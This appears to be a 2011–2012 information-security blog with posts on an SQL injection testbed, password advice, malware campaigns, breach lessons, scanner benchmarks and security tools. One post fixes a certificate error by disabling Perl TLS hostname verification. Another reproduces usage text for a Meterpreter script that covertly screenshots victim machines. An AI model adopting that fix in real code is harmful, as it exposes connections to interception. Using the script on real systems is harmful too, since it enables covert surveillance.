Vitalisec - Vital Information Security

SQLol - SQL Injection Testbed

2012-01-09T11:26:00.000-08:00

Have you been wanting to learn more about SQL injection (SQLi) and practice identifying SQLi vectors in applications? A new SQLi testbed has been created by Trustwave that is easy to setup and provides a variety of SQLi vectors to practice on.

"SQLolis a configurable SQL injection testbed. It allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. The author thought about different data extraction techniques from SQL injection flaws and found that a vulnerability framework that includes SQLi verbose error extraction techniques was never found. To be precise, the author never came across a vulnerability framework that includes SQL injection in a DELETE query. So, with this aim in mind, SQLol was born, specifically for SQL injection flaws. It can be useful to those who know nothing about SQL injection, or those who know a bit of it. SQLol comes with a set of challenges which help you with performing some flavor of SQL injection and have pre-configured settings."

Options provided by SQLol:

Type of query (SELECT, DELETE, INSERT, UPDATE, and custom)
Location within query (String/Int in WHERE clause, column name, ORDER BY clause, etc.)
Type and level of sanitization (Single quotes [remove, escape, double], keyword blacklist [three levels of difficulty], etc.)
Level of query output (No rows, One row, All rows)
Verbosity of error messages (No errors, Generic errors, Verbose errors)
Visibility of query
Injection string entry point

Download SQLol

Free Online Education from Stanford University

2011-12-12T21:03:00.000-08:00

Stanford Engineering professors are setting out to add a new level of interactivity to online education by offering the university's most popular computer science classes for free.

The class will consist of lecture videos, which are broken into small chunks, usually between eight and twelve minutes each. Some of these may contain integrated quiz questions. There will also be standalone quizzes that are not part of video lectures, and other assignments. There will be approximately two hours worth of video content per week.

You will not get university credit for participating in the courses. Expand your professional knowledge and earn some CISSP CPE credits instead!

Computer Security
http://www.security-class.org/
Dan Boneh, John Mitchell and Dawn Song
Class Starts February 2012

Learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities.

The course will cover topics such as:

Memory safety vulnerabilities
Techniques and tools for vulnerability detection
Sandboxing and isolation
Web security
Network security
Malware detection and defense
Mobile platform security

2011-11-23T19:09:00.001-08:00

The FBI is seeking information from individuals, corporate entities and Internet Services Providers who believe that they have been victimized by malicious software (“malware”) related to the defendants.

This malware modifies a computer’s Domain Name Service (DNS) settings, and thereby directs the computers to receive potentially improper results from rogue DNS servers hosted by the defendants.

Please use the following link http://www.fbi.gov/news/stories/2011/november/malware_110911 or navigate to the fbi.gov News section and select the 11.09.11 story entitled “International Cyber Ring That Infected Millions of Computers Dismantled” to learn about DNSChanger malware and how it can affect your computer, check your computer’s DNS settings, and register as a victim of the DNSChanger malware.

Bad Password Campaign?

2011-11-10T16:15:00.000-08:00

Google recently launched a major advertising campaign around its “Good to Know” guides for online safety and privacy. Google’s password advice has appeared on billboards and as a full-page ad in The Economist.

Their example of a “very strong password” is ‘2bon2btitq’, taken from the famous Hamlet quote “To be or not to be, that is the question”.

"Houston, we have a problem!!!!!"

According to the leaked 2009 RockYou password dataset, which contains 500,000 of the most common passwords, it was found that 4 people out of 32,603,387 picked ‘2bon2btitq’ and 5 out of 32,603,387 picked ‘2bon2b.’ An attacker, using the RockYou password dataset, would be able to successful crack or brute-force this example user password within 2-3 days.

Google’s advised password is not that strong!!!! Why is this?!?

Human passwords are the most common form of authentication for applications, systems and networks. Yet, we continue to face the challenge of easily guessed or cracked passwords due to users selecting easy passwords.

To overcome weak and easy passwords, we began to train our users to create mnemonic phrase-based passwords. But, we have forgotten there is still a human element in this approach. How common is the phrase, “To be or not to be, that is the question”? Humans will still resort to using common phrases, sayings, expressions, or favorite movie quotes for the creation of mnemonic phrased-based passwords. And attackers are taking these common lists and creating new password dictionaries for their attacks.

Don't get me wrong. Mnemonic phrased-based passwords have helped many people with improving the security and strength of their passwords. A recent study revealed there are still a huge number of people who pick from a very small list of common passwords.

In fact, 91% of all user passwords sampled all appear on the list of just the top 1,000 passwords. Even more interesting is that the list of the 10,000 most common passwords represents 99.8% of all user passwords!

For picking a strong password, it is recommend to use xkcd’s advice and tools like Diceware for generating something easy to memorize and nearly-guaranteed be unique. For mission critical systems and sensitive data, 2-factor authentication is the best solution for user authentication.

I recommend using 1Password and PasswordSafe for the management of multiple and complex passwords and as an alternative for users who write their passwords down and hide them under their keyboards! ;-)

FTC Takes on Super Cookies

2011-11-10T13:49:00.000-08:00

On November 8, 2011, the Federal Trade Commission announced that an online advertiser, ScanScout, agreed to settle FTC charges that it deceptively used "Flash" cookies (also known as super cookies) to track consumers online.

As explained by Wired, unlike traditional browser cookies, Flash cookies are not controlled by privacy controls in a Web browser. That means that even if a user adjusts browser settings to clear the computer of tracking objects, Flash cookies most likely will remain.

FTC Allegations

According to the FTC, ScanScout is an advertising network that places video ads on websites for advertisers. ScanScout engages in behavioral advertising – it collects information about consumers’ online activities and then serves video ads targeted to their interests.

The FTC alleged that ScanScout deceptively claimed that consumers could opt out of receiving targeted ads by changing their computer’s Web browser settings to block cookies. Specifically, ScanScout's privacy policy stated that:

General user data, such as your computer’s Internet Protocol (IP) address, operating system and browser type, pages you visited, and the date and time of your visit, is automatically collected through the use of “cookies”. Cookies are small files that are stored on your computer by a website to give you a unique identification. Cookies also keep track of services you have used, record registration information regarding your login name and password, record your preferences and keep you logged into the Site. You can opt out of receiving a cookie by changing your browser settings to prevent the receipt of cookies. Since each web browser is different, we recommend that you please look through your browser “Help” file to learn the correct way to modify your cookies set-up. . . We may use automatically collected information and cookies information for a number of purposes, including but not limited to. . . provide custom, personalized content, and information; monitor the effectiveness of our marketing campaigns. . . (emphasis added)

According to the FTC, however, ScanScout actually used Flash cookies that users could not block by adjusting their Web browser settings. The FTC alleged that ScanScout's representations that consumers could prevent ScanScout from collecting data about their online activities by changing their browser settings were false or misleading and constituted deceptive acts or practices in or affecting commerce in violation of Section 5(a) of the Federal Trade Commission Act.

Rampant insider hacking at U.S. immigration agency

2011-08-23T09:03:00.000-07:00

I have always tried to follow that old saying, "Learn from other people's mistakes, you don't have time to make all of them yourself". Over the past year, the security and business world has had a wealth of opportunity to learn from the many data breach incidents that have impacted multiple organizations. While most of the reports have been vague with attack vector information and root causes, there are lessons to be learned around prevention, effective detection and monitoring, and efficient incident response.

Here is a recent example:

As reported by Homeland Security Newswire, "A yearlong investigation by the DHS Inspector General has revealed multiple instances of insider hacking at U.S. Citizenship and Immigration Services (USCIS); the inspector general found that employees had accessed management-level email and other confidential files."

"According to the report, employees and supervisors abused logon privileges, gained unauthorized access, and even allegedly altered audit logs to delete any record of their activities. The inspector general’s investigation focused on seventeen individuals in particular, all of who were information technology specialists.

Investigators also found “hackware” on several computer drives – software that allows users to intercept sensitive information passing through the agency’s network."

"The inspector general warned that USCIS could be putting itself at greater risk from insider threats as a result of the poorly planned $2.4 billion project to automate immigration paperwork. USCIS Transformation is designed to be an online system for the agency’s immigration records that will improve fraud detection, but the inspector general said the program is missing controls to prevent internal hacking."

What can be learned from this incident as reported? First thing, as security professionals, we need to fully understand the main purpose and mission of the business that we work for and protect it. In this case, the "U.S. Citizenship and Immigration Services (USCIS) is the government agency that oversees lawful immigration to the United States."

The USCIS Mission Statement is:

"USCIS will secure America’s promise as a nation of immigrants by providing accurate and useful information to our customers, granting immigration and citizenship benefits, promoting an awareness and understanding of citizenship, and ensuring the integrity of our immigration system."

Hold on! Does this mission statement map to any of the 3 core tenants of security: Confidentiality, Integrity, Availability? Can you ascertain the main reason USCIS is in business? Absolutely, yet USCIS failed to meet the objectives of it's own mission statement!

Immigration and it's policies have continued to be one of the top two political topics in the US. Identity theft continues to be the prime motive for the majority of data breaches. So, why did a $2.4 billion project to automate immigration paperwork fail to address internal fraud when it has been proven that over half of all IT fraud and incidents are the result of "regular workers, privileged employees usually are the ones to target the company's most sensitive data."

I am going to take a guess that immigration records would be considered "sensitive data" for USCIS. This leads to our second lesson learned: do you have a data classification process in your organization? Do you know what systems process, store, and/or transmit each type of data within your organization? Do you know who has access to each type of data, where is the data being accessed from, when is the data being access, and what is being done to your data?

Collecting logs pertaining to network, system, application and database activities and actions is imperative to the success of your security program. According to the recent Verizon Data Breach report, 90 percent of the time, companies had logs available from the time of the incident, but only managed to discover breaches in five percent of cases. Technology exists to collect, correlate, and mine logs for anomalies which may indicate an internal or external breach. These types of technologies should be coupled to your data classification and system inventory. Any system, application, and database processing, storing, and/or transmitting your sensitive data should have auditing and logging enabled and sending it's logs to a centralized Security Information and Event Manager (SIEM) or log server.

The last lesson to be learned: access control management and auditing. Periodic audits, or the more positive saying "assurance activities", should be performed against all users, systems, and processes that pertain to your organization's sensitive data.

While we may not know or understand the overall root causes of the security failures with the new USCIS immigration system, security professionals around the world, in any organization, can use this incident report and build business cases for implementing new or enhanced policies, processes and activities within their organizations. Many organizations are "resource challenged" and prioritizing where we spend our limited resources is important. Data classification can help focus and prioritize where we spend our staff time and our budgets, and assist in building a strong strategy in protecting our organizations most sensitive assets.

Malware DNS Scraper v0.3.1 Error

2011-08-12T17:23:00.000-07:00

Went to use the Malware DNS Scraper perl script from Mayhemic Lab and received the following error:

Malware DNS Scraper v0.3.1 - DNS Cache Scraper by Mayhemic Labs (mayhemiclabs.com)
Downloading the Mayhemic Labs malicious hosts list...
Error at https://secure.mayhemiclabs.com/malhosts/malhosts.txt
500 Can't connect to secure.mayhemiclabs.com:443 (certificate verify failed)
Aborting at malwarednsscrape-0.3.1.pl line 81.

To fix this issue, add the following line to malwarednsscrape-0.3.1.pl after the "use" module statements:

$ENV{'PERL_LWP_SSL_VERIFY_HOSTNAME'} = 0;

Web Application Scanner Benchmark Results

2011-08-02T08:33:00.000-07:00

I have blogged several times on the prevalent issue of SQL Injection (SQLi). Watching the recent activities of the Antisec movement continues to demonstrate the lack of security awareness, lack of due care, and lack of due diligence on the Internet when it comes to input manipulation attacks.

It does not take a rocket scientist to locate the most basic SQL injection vector in an application. If a "script kiddie" can find them, why can't a web developer or web administrator locate them? These attack vectors can be identified even without having a security professional on staff within your organization. So, why aren't basic security checks performed as part of an organization's development life cycle?

The same tools being used today by malicious attackers are available to security staff, web development staff, web administrators, and anyone else with access to the Internet. And the best news ... most of the tools being used by attackers are FREE and fairly easy to use.

Recently, the results of a comparison of 60 commercial & open-source black box web application vulnerability scanners was released and titled, "The Scanning Legion: Web Application Scanners Accuracy Assessment & Feature Comparison Commercial & Open Source Scanners".

From the author's (Shay Chen) prologue:
"Although manual penetration testing has always been the main focus of the test, most of us use automated tools to easily detect "low hanging fruit" exposures, increase the coverage when testing large scale applications in limited time-frames and even to double check locations that were manually tested.

The questions always pops up, in every penetration test in which these tools are used ... "Is it any good?", "Is it better than…" and "Can I rely on it to…" are questions that every pen-tester asks himself whenever he hits the scan button. Well, curiosity is a strange beast… it can drive you to wander and search, consume all your time in a search for obscure solutions. So recently, because of curiosity, I decided that I want to find out for myself, and invest whatever resources necessary to solve this mystery once and for all.

Although I can hardly state that all my questions were answered, I can definitely sate your curiosity for the moment, by sharing insights, interesting facts, useful information and even some surprises, all derived from my latest research which is focused on the subject of commercial & open-source web application scanners."

The scanners were all tested against the latest version of WAVSEP (v1.0.3), a benchmarking platform designed to assess the detection accuracy of web application scanners. The purpose of WAVSEP’s test cases is to provide a scale for understanding which detection barriers each scanning tool can bypass, and which vulnerability variations can be detected by each tool. The various scanners were tested against the following test cases (GET and POST attack vectors):

66 test cases that were vulnerable to Reflected Cross Site Scripting attacks.
80 test cases that contained Error Disclosing SQL Injection exposures.
46 test cases that contained Blind SQL Injection exposures.
10 test cases that were vulnerable to Time Based SQL Injection attacks.
7 different categories of false positive RXSS vulnerabilities.
10 different categories of false positive SQLi vulnerabilities.

The SQL Injection Detection Accuracy of Web Application Scanners – Open Source & Free Tools

Note that the BLUE bar represents the vulnerable test case detection accuracy, while the RED bar represents false positive categories detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).

One conclusion made by the author is "Some open source tools, even the most accurate ones, are relatively difficult to install & use, and still require fine-tuning in various fields."

It is true that some tools may require a user to have level of technical expertise for installation. There are many live CD's that help overcome this issue. Here is a list of recommended live CD's:

To find the most basic of web application issues, most tools require a MINIMAL amount of tuning and require a PHD. That is ... all you have to do is enter the IP address or URL and click the Push Here Dummy (PHD) button. Additional fine tuning is used to improve scanning accuracy and for advanced testing. But, we are talking about finding basic issues. Consistently doing the basics throughout the life cycle of an application.

I have always like the Nike motto of "Just Do It!" Grab a live CD, get familiar with one or two of the application assessment tools from the Web Application Scanner Benchmark, and start testing your applications. If your not doing it, I guarantee someone else is!!!

Malicious Hotel Transaction Spam

2011-07-30T17:47:00.000-07:00

A very malicious spam campaign has been detected and reported by the good folks at m86 Security Labs.

The attack consists of emails appearing to come from reception desk managers at various hotels, targeting Visa users. The emails exhibit subject lines such as “Hotel Sutton Place made wrong transaction” and “Wrong transaction from your credit card in Four Seasons Resort Scottsdale” and contain a rather long explanation in very bad English, claiming that the hotel has charged your credit card for over $1,000 by mistake.

To summarize, the email generally says, “Please see the attached form. You need to fill it in and contact your bank for the return of funds,” and offers an attachment named RefundFormXXX.zip (XXX represents a random three digit number). The unzipped file is Refund-Form.exe which is outfitted with the icon for an Excel file in order to encourage opening (executing) it. Once executed, the malware downloads another executable from a Russian domain which is a fake Anti-Virus (AV) application named ”Security Protection”.

An HTTP request is sent to 188.72.202.121, requesting a module called ‘grabbers’ from load.php. A file called update.dat is retrieved, which is actually an encrypted Windows .dll file. Once decrypted it acts as a password stealer looking for stored passwords and targeting a huge number of applications including instant messaging programs, poker clients, FTP clients and web browsers.

Roughly one day after all of this malicious activity takes place, another HTTP request is sent, retrieving another fake AV called “Personal Shield Pro".

Metasploit: The Penetration Tester's Guide

2011-07-28T16:55:00.001-07:00

I received my copy of "Metasploit: The Penetration Tester's Guide" on Friday and read it over the weekend.

"Metasploit: The Penetration Tester's Guide" teaches readers how to identify vulnerabilities in networks by using Metasploit to launch simulated attacks. The book's authors, acknowledged Metasploit gurus, begin by building a foundation for penetration testing and establishing a methodology.

From there, they explain the Framework's conventions, interfaces, and module system, and then move on to advanced penetration testing techniques, including network reconnaissance and enumeration, client-side attacks, devastating wireless attacks, and targeted social-engineering attacks.

This book shows penetration testers how to:

Find exploits in unmaintained, misconfigured, and unpatched systems
Perform reconnaissance and find valuable information about a target
Bypass antivirus technologies and circumvent security controls
Integrate Nmap, NeXpose, and Nessus data with Metasploit
Use the Meterpreter shell to launch attacks from inside a network
Harness stand-alone Metasploit utilities, third-party tools, and plug-ins
Learn how to write Meterpreter post exploitation modules and scripts.

The book covers similar topics as the online Metasploit Unleashed training website but with more technical details, more depth, and uses relevant and current examples. What I really liked about the book was the incorporation of the Metasploit tools and capabilities with a penetration testing methodology. There are many tools in existence today. You can learn how to use a tool but knowing when to use a tool, why to use a tool, and where to use a tool are extremely important when it comes to testing.

Additionally, I personally like using books as a reference because they allow me to write additional notes/references and highlight key items. I cannot do this with a website! ;-)

I give this book a 5 out of 5 star review.

ModSecurity SQL Injection Challenge: Lessons Learned

2011-07-28T06:07:00.000-07:00

SQL injection (SQLi) is officially the Number 1 Web Application Security Risk on the current OWASP Top 10 list. Did you know that the first SQLi vulnerability was discovered 11 years ago? Yet, SQLi vectors are still being discovered on the Internet in both old and NEW applications! To address this issue, many people are installing Web Application Firewalls (WAF) as a "band-aid" prevention control for poorly developed web applications. Experienced security professionals know that given enough time, a determined attacker will eventually find a way to bypass your prevention capabilities.

This has been proven through Trustwave's SpiderLabs sponsored SQL Injection and Filter Evasion Challenge. They recently posted lessons learned from the challenge with very valuable and useful information for penetration testers, security managers, web developers, and IR teams ... to name a few. ;-)

From the SpiderLabs lessons learned post:

"Hacking Resistance (Time-to-Hack)

Many people wrongly assume that installing a Web Application Firewall will make their sites "Hack Proof." Sadly, this is not reality. The real goal of using a web application firewall should be to gain visibility and to make your web applications more difficult to hack meaning that it should take attackers significantly more time to hack a vulnerable web site with a WAF in front in blocking mode vs. if the WAF was not present at all.

The idea is to substantially increase the "Time-to-Hack" metric associated with compromising a site in order allow for operational security to identify the threat and take appropriate actions.

Think of a WAF as a tool to identify and block the initial probes and to alert incident response personnel. It is up to the IR teams to match wits with an attacker and protect the application as necessary.

With this in mind, we analyzed how long it took for each Level II winner to develop a working evasion for the CRS v2.2.0. We are basing this off of the correlated IP address in the logs that was tied to the final evasion payloads submitted to the ModSecurity team. We also saw that many Level II winners actually tested their payloads using the CRS Demo page so we had to correlate test payloads there as well.

Avg. # of Requests to find an evasion: 433
Avg. Duration (Time to find an evasion): 72 hrs
Shortest # of Requests to find an evasion: 118
Shortest Duration (Time to find an evasion): 10 hrs

This data shows that having active monitoring and response capabilities of ongoing web attacks is paramount as it may only a matter of hours before a determined attacker finds a way through your defenses."

10 hours of probing and testing (118 requests) to find an attack vector. Prevention controls will eventually fail and it is imperative that you have the appropriate detection capabilities in place when they do fail. 10 hours of probing, from an individual IP address, should provide sufficient enough data to indicate further investigation actions are needed by your incident response (IR) team. One thing to note is that a malicious attacker will not be performing their probes and attacks from a single IP address. Most attackers will be using proxy servers to hide their true IP address. Correlation of this activity can still be accomplished through a comprehensive monitoring and detection approach.

I personally am a believer in the Network Security Monitoring (NSM) approach to monitoring and detection. NSM data collection is accomplished through 4 layers: full data content capturing, session data, statistical data, and signature data. The activity from this SQLi Challenge should have been detected through session data, statistical data, and signature data. Signature data can be limited through the use of evasion techniques and the attacker may use your web application SSL capability to totally evade your network signature based capabilities.

Feeding web application, WAF, firewall, host and network intrusion detection system, and network device logs into a security incident and event manager (SIEM) will assist in the correlation and analysis of signature, session and statistical data into useful information for your security teams to identify malicious and anomalous activity against your organization's assets.

Conclusion: I have found the information from this challenge useful in the following areas:

New evasion techniques as a web application tester. Yeah!
Penetration testing for detection and response capabilities as a penetration tester.
Solid information for communicating the true value of a WAF to organization application developers and management. WAF's do have value in an effective security program but do not replace the true problem of poorly developed applications. Fix those applications!
Information for monitoring, detection, and IR teams to validate and improve their approach for detecting SQLi and other input manipulation web attacks.

Exploit/Vulnerability Search Engine

2011-07-25T18:58:00.000-07:00

In the past, I've used the SCURN search engine as an easy and fast way to search many sites for security vulnerability research information. This search engine uses the databases of the following sites: Bugtraq, CVE, ISS, OSVDB, Secunia, Snort, Nessus, Packetstorm, Security Tracker, Bugtraq Mailing List and Full-Disclosure Mailing List. Unfortunately, the code has not been kept up-to-date and I often find the results lacking and resort to Google.

Google is the "oracle" of search engines but sometimes it can provide too much information. If I am looking for specific vulnerability or exploit information, I have been using the Exploit/Vulnerability Search Engine. This website currently utilizes data from NVD, OSVDB, SecurityFocus, Exploit-DB, Metasploit, Nessus, OpenVAS, and PacketStorm.

"Unlike other exploit search engines which are simply custom Google searches, this site actually crawls the source sites and parses the contained data. Once the data is collected and parsed, it is inserted into the www.exploitsearch.net database and becomes available for searching."

Another area of interest is the Exploit/Vulnerability Search Engine statistics page & the Naughty List.

Hope you find this to be a valuable resource!

Free Strategic Cyber Security Book

2011-07-06T09:53:00.000-07:00

Doctor Kenneth Geers has released a new 169 page book and made it available for download. In this book Dr. Geers examines, evaluates and prioritizes four approaches to mitigating the online attack threat and to improve nation state defense postures.

Internet Protocol version 6 (IPv6)
Sun Tzu’s Art of War
Attack deterrence
Arms control

About the Author
Dr. Geers, PhD, CISSP, Naval Criminal Investigative Service (NCIS), is a Scientist and the US Representative to NATO CCD COE. He will present this research at DEF CON 19 in Las Vegas in August, and provide a Keynote at Hack-in-the-Box Malaysia in October.

Much of the context of the material presented is from a national security perspective dealing with nation-state versus nation-state, however much of the material can be good background for what is already upon some of us, and looming on the horizon for businesses. Definitely worth a read .... pass it around.

Anonymous Releases "Super Secret Security Handbook"

2011-06-30T17:48:00.000-07:00

The rogue hacker movement Anonymous has released the "OpNewBlood Super Secret Security Handbook" (pdf) in an effort to recruit more would-be hacktivist types to further the Internet anarchy cause.

The publication will edify aspiring armchair hackers on methods used to obscure one's identity while conducting operations online and avoid exposing one's identity to rival hackers and law enforcement.

The guide is replete with step-by-step instructions and peppered with tips on how to avoid missteps in the process, as well as warnings for those who might me getting in over their head from a technical standpoint:

"Always be cautious when tinkering with systems you don't fully understand, as this may lead to undesirable results, detection, and in extreme cases system failure or legal trouble... While this guide does attempt to put it simply and in laymans terms, you the user are ultimatly [sic] responsible for the security of your own systems," the publication warns.

The publication is more evidence that hacktivist groups like Anonymous and the now supposedly defunct LulzSec are shifting tactics by moving away from conducting offensive operations themselves, and instead may be seeking to educate and enable others take up the cause.

Recently we have also seen the emergence of the Anonymous-backed School4lulz, a resource for hi-tech hooligans to learn the finer art of hacking, cross-site scripting, SQL injections, botnet herding, doxing, and tools of the trade.

By concentrating on instruction and inspiration, the core leadership of these hacker collectives can effectively remove themselves as primary targets for law enforcement and anti-AntiSec hackers like The Jester (th3j35t3r), The A-Team, and the Web Ninjas, and instead encourage their less-savvy teen minions to commit the attacks and take the heat.

Secure Coding Training Website

2011-06-20T13:57:00.000-07:00

What is the Purpose of spotthevuln.com

Spotthevuln.com was designed to give developers more insight into designing code with security in mind. When developers write source code they rarely think about security.

These problems can be avoided if the developers wrote the code correctly (securely) the first time.

After insecure code is deployed,one of two things can happen.

The bug can be found,in which case the developers have to waste development time in order to rewrite their solutions.
The vulnerability is exploited, and the organization loses money, consumer trust, and can gain a negative reputation to their brand.

Spotthevuln.com can aid developers,development managers,and QA staff by helping them sharpen their skills in spotting vulnerabilities in source code.

Spotthevuln.com use actual code snippets from open source applications to demonstrate how often vulnerable pieces of code get deployed into the real world.

The purpose is simple:

Every Monday, 8:00am PST, a vulnerable piece of code is posted.
Every Friday, 8:00am PST, the solution is posted.

On Monday, look at the piece of the code to see if you can identify what the security vulnerability is. Like everything else being able to spot vulnerable code takes practice.

Doing this exercise should take between 5 and 10 minutes out of your day. Do it while you drink your morning coffee and you will already be on your way to being able to write more secure applications.

Current Programming Languages

PHP
Java
JavaScript
ActionScript

Popular Vulnerabilities Addressed

Cross-Site Scripting (XSS)
SQL Injection
Defense In Depth
Carriage Return/Line Feed (CRLF) Injection
Privilege Escalation
HTTP header injection
File Inclusion
URL Redirection
LDAP Injection

VUPEN Pwned Google Chrome aka Sandbox/ASLR/DEP Bypass

2011-05-10T06:55:00.000-07:00

The exploit shown in this video is one of the most sophisticated codes seen and created so far as it bypasses all security features including ASLR/DEP/Sandbox, it is silent (no crash after executing the payload), it relies on undisclosed (0day) vulnerabilities discovered by VUPEN and it works on all Windows systems (32-bit and x64).

NSA Presents “Best Practices for Keeping Your Home Network Secure”

2011-05-09T17:21:00.000-07:00

‘Best Practices for Keeping Your Home Network Secure’ is a new 8-page document published by the National Security Agency to help home users in keeping their system secure and protected.

"The cyber threat is no longer limited to your office network and work persona. Adversaries realize that targets are typically more vulnerable when operating from their home network since there is less rigor associated with the protection, monitoring, and maintenance of most home networks. Home users need to maintain a basic level of network defense and hygiene for both themselves and their family members when accessing the Internet."

The document is divided in 4 parts:

Host-Based Recommendations
Network Recommendations
Operational Security (OPSEC)/Internet Behavior Recommendations
Enhanced Protection Recommendations

The document contains some good recommendations for using the latest version of an operating system, keeping up-to-date on patches for OS and applications, install security software, and limiting the use of privilege (administrator) accounts.

I would be curious if a home "netizen" would read this document, fully understand it, and implement it? My hunch is that they will not read it!!! If they do, the average person will start getting lost at recommendation #4 - "Use a Web Browser with Sandboxing Capabilities" in the Host-Based Recommendations section or recommendation #4 "Implement an Alternate DNS Provider" in the Network Recommendations section. What does sandboxing and DNS mean to a home user? You might as well be talking in some form of intergalactic language.

While I appreciate the NSA's level of effort on this document I feel it has fallen short in being a useful document for the average home user.

Windows Security Event Log Resources

2011-04-18T19:59:00.000-07:00

The following links describe every Windows Server Security Event log that exists:

Windows NT
KB174074 – Security Event Descriptions

Windows 2000
KB299475 – Windows 2000 Security Event Descriptions (Part 1 of 2)
KB301677 – Windows 2000 Security Event Descriptions (Part 2 of 2)

Windows 2003
Windows 2003 Security Guide, Chapter 4, Audit Policy

Windows Vista to Present
KB947226 – Description of security events in Windows Vista and in Windows Server 2008
Security audit events for Microsoft Windows Server 2008 and Microsoft Windows Vista

Additional Resources
Ultimate Windows Security
EventID.net
Security Log Encyclopedia

ScreenSpy – New Meterpreter Script

2011-01-27T06:42:00.000-08:00

A new Meterpreter script named “ScreenSpy” was developed and added to Metasploit. This Meterpreter script captures images from a remote victim system, at a predefined interval, and displays the image sequence on your attack system.

meterpreter > run screenspy -h

Screenspy v1.0
--------------

Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long.
Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long.
Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode.

Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com

OPTIONS:

-d The Delay in seconds between each screenshot.
-h Help menu.
-s The local system linux/windows
-t The time to run in sec.

Here is a video demo of the script:

Latest version of script

2011 Security Strategy

2011-01-26T19:40:00.000-08:00

Forrester's 2011 security strategy recommendations

1 - Develop Governance Strategies To Support An Empowered Organization

Prepare for social technology adoption.
Help the business devise a strategy to leverage cloud services.
Actively support mobility in the post-PC era.

2 - Mature Existing Processes To Enhance Data Protection Capabilities

From reactive tools to proactive focus on integrating tools and processes.
From identity management to information and access management.
From ineffective incident planning to robust breach response.

3 - Build A Competency In Analytics For Improved Visibility, Metrics, And Decision-Making

Educate and equip risk owners with relevant information for decision-making.
Demonstrate the value of security with business and financial metrics.
Enhance operational measures through validation and correlation.

Wikileaks Cartoon

2011-01-19T21:36:00.000-08:00

Attack Surface Analyzer Tool

2011-01-19T06:19:00.000-08:00

Attack Surface Analyzer is the same tool used by Microsoft's internal product teams to catalogue changes made to the operating system by the installation of new software.

Attack Surface Analyzer takes a snapshot of your system state before and after the installation of product(s) and displays the changes to a number of key elements of the Windows attack surface. The Attack Surface Analyzer performs a deeper analysis than other tools that only look at user-configurable policy, settings, and patch levels – it provides analysis of services vulnerable to tampering, application directories with weak ACLs, and processes with impersonation tokens just to name a few.

This allows:

Developers to view changes in the attack surface resulting from the introduction of their code on to the Windows platform
IT Professionals to assess the aggregate Attack Surface change by the installation of an organization's line of business applications
IT Security Auditors evaluate the risk of a particular piece of software installed on the Windows platform during threat risk reviews
IT Security Incident Responders to gain a better understanding of the state of a systems security during investigations (if a baseline scan was taken of the system during the deployment phase)

The Attack Surface Analyzer could be a new way to help hold vendors accountable to a higher standard. For example, you could require that the vendor provides the Attack Surface Report in your procurement language. Or you could run your own reports for any new application that gets installed so you know how it impacts the attack surface of your systems and then build in the appropriate mitigation strategies or countermeasures.

The Attack Surface Analyzer tool is a FREE tool that supports the Microsoft SDLC

nftracker - The Network File Tracker

2011-01-16T08:53:00.000-08:00

Want to know the types of files that are traversing your network? I came across a new tool, called nftracker, that does exactly by recording IP addresses (source and destination), port number, and file type. The tool is still under development.

nftracker is a networks sniffing daemon that will read a pcap file or sniff a network interface and look for files that traverse your network. nftracker is session oriented, and will print out the files seen in a session.

Download: nftracker GIT Repository

Default, nftracker logs to /var/log/nftracker-csv.log. The logfile looks like this:

timestamp,[ session ],FILE_TYPE
timestamp,proto,src_ip,src_port,dst_ip,dst_port,FILE_TYPE

1287847447,6,192.168.22.100,5623,192.168.22.200,80,html
1287847447,6,192.168.22.100,5623,192.168.22.200,80,gif
1287847448,6,192.168.22.100,5623,192.168.22.200,80,jpg
1287848107,17,192.168.22.100,7342,192.168.22.200,2049,zip
1287848107,17,192.168.22.100,7342,192.168.22.200,2049,pdf
1287848108,17,192.168.22.100,7342,192.168.22.200,2049,doc
1287848108,17,192.168.22.100,7342,192.168.22.200,2049,mpeg
1287848111,17,192.168.22.100,7342,192.168.22.200,2049,bmp

Learning Metasploit

2011-01-08T18:37:00.000-08:00

Any IT professional that says that they need to take a training class to learn something should remove "professional" out of their vocabulary! I am just saying.... since an immeasurable amount of information can be found on the Internet that can be utilized in expanding your knowledge and skill set. Let's pick a tool like Metasploit.

Using Google, I found a number of resources covering multiple topics on this tool. One such website found provides a free Metasploit online course and is called Metasploit Unleashed.

"Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework. This is the free online version of the course. If you enjoy it and find it useful, we ask that you make a donation to the HFC (Hackers For Charity), $9.00 will feed a child for a month, so any contribution is welcome. We hope you enjoy this course as much as we enjoyed making it. "

If you have not been through this course, I invite you to do it as you may find that you will learn at least one new thing about Metasploit. On a side note, I also encourage you to donate to the Hackers For Charity cause as well.

Metasploit Unleashed was created by 9 authors, who have spent countless hours in providing an easy to understand, thorough, and up-to-date course on all of the basic aspects of Metasploit. This site alone is extremely valuable to anyone willing to "roll their sleeves up and get their hands dirty". I am not advocating downloading Metasploit, go through the online Metasploit Unleashed course, and pick targets on the Internet to attack! The developers of Metasploit have created a VMware instance called Metasploitable. Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. You can get more information on Metasploitable on the Metasploit blog.

Another resource is a tool I came across, through my daily review of 500+ blogs and security websites, called Armitage. BTW, in writing this post, I discovered Metasploit Unleashed already has a tutorial in their "Beyond Metasploit" module.

"Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don't use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you."

Armitage assists the security professional by organizing Metasploit's capabilities around the following hacking process:

A comprehensive manual on how to use Armitage can be found here: Armitage Manual. Installation of Armitage is extremely simple using a BackTrack 4R2 VMware instance. I played with it for several hours and found it to be a tool that I will be recommending to any security professional on the subject of Metasploit training and penetration testing.

Attending training courses does have benefits that cannot be fully replaced through Internet resources. Unfortunately, the current economy has many organizations cutting back on their budgets which has affected training opportunities for security professionals. My advice: pick a topic, Google it, and start learning!

